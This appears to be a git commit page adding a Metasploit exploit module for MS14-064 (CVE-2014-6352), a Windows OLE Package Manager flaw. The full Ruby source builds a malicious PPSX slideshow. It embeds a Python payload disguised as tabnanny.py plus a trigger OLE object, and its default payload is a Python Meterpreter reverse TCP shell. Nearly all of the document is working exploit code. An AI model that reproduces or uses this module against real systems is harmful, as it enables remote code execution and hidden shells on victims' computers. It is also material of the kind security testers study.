Land #4196 - MS14-064 bypassing UAC
commit
5a54537cbc
|
@ -0,0 +1,152 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
|
||||
allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
|
||||
publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
|
||||
SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
|
||||
However, based on our testing, the most reliable setup is on Windows platforms running
|
||||
Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as
|
||||
using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a
|
||||
failure in the CPackage::CreateTempFileName function.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Haifei Li', # Vulnerability discovery and exploit technique
|
||||
'sinn3r', # Metasploit module
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-6352'],
|
||||
['MSB', 'MS14-064'],
|
||||
['BID', '70690'],
|
||||
['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']
|
||||
],
|
||||
'Platform' => 'python',
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
},
|
||||
'DisclosureDate' => "Nov 12 2014",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
payload_packager = create_packager('tabnanny.py', payload.encoded)
|
||||
trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
|
||||
zip = zip_ppsx(payload_packager, trigger_packager)
|
||||
file_create(zip)
|
||||
end
|
||||
|
||||
def zip_ppsx(ole_payload, ole_trigger)
|
||||
zip_data = {}
|
||||
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
|
||||
|
||||
Dir["#{data_dir}/**/**"].each do |file|
|
||||
unless File.directory?(file)
|
||||
zip_data[file.sub(data_dir,'')] = File.read(file)
|
||||
end
|
||||
end
|
||||
|
||||
# add the otherwise skipped "hidden" file
|
||||
file = "#{data_dir}/_rels/.rels"
|
||||
zip_data[file.sub(data_dir,'')] = File.read(file)
|
||||
|
||||
# put our own OLE streams
|
||||
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload
|
||||
zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger
|
||||
|
||||
# create the ppsx
|
||||
ppsx = Rex::Zip::Archive.new
|
||||
zip_data.each_pair do |k,v|
|
||||
ppsx.add_file(k,v)
|
||||
end
|
||||
|
||||
ppsx.pack
|
||||
end
|
||||
|
||||
def create_packager(file_name, contents)
|
||||
file_info = [2].pack('v')
|
||||
file_info << "#{file_name}\x00"
|
||||
file_info << "#{file_name}\x00"
|
||||
file_info << "\x00\x00"
|
||||
|
||||
extract_info = [3].pack('v')
|
||||
extract_info << [file_name.length + 1].pack('V')
|
||||
extract_info << "#{file_name}\x00"
|
||||
|
||||
file = [contents.length].pack('V')
|
||||
file << contents
|
||||
|
||||
append_info = [file_name.length].pack('V')
|
||||
append_info << Rex::Text.to_unicode(file_name)
|
||||
append_info << [file_name.length].pack('V')
|
||||
append_info << Rex::Text.to_unicode(file_name)
|
||||
append_info << [file_name.length].pack('V')
|
||||
append_info << Rex::Text.to_unicode(file_name)
|
||||
|
||||
ole_data = file_info + extract_info + file + append_info
|
||||
ole_contents = [ole_data.length].pack('V') + ole_data
|
||||
|
||||
ole = create_ole("\x01OLE10Native", ole_contents)
|
||||
|
||||
ole
|
||||
end
|
||||
|
||||
def create_ole(stream_name, data)
|
||||
ole_tmp = Rex::Quickfile.new('ole')
|
||||
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
|
||||
|
||||
stm = stg.create_stream(stream_name)
|
||||
stm << data
|
||||
stm.close
|
||||
|
||||
directory = stg.instance_variable_get(:@directory)
|
||||
directory.each_entry do |entry|
|
||||
if entry.instance_variable_get(:@_ab) == 'Root Entry'
|
||||
# 0003000C-0000-0000-c000-000000000046 # Packager
|
||||
clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
|
||||
entry.instance_variable_set(:@_clsId, clsid)
|
||||
end
|
||||
end
|
||||
|
||||
# write to disk
|
||||
stg.close
|
||||
|
||||
ole_contents = File.read(ole_tmp.path)
|
||||
ole_tmp.close
|
||||
ole_tmp.unlink
|
||||
|
||||
ole_contents
|
||||
end
|
||||
|
||||
end
|
||||
|
Loading…
Reference in New Issue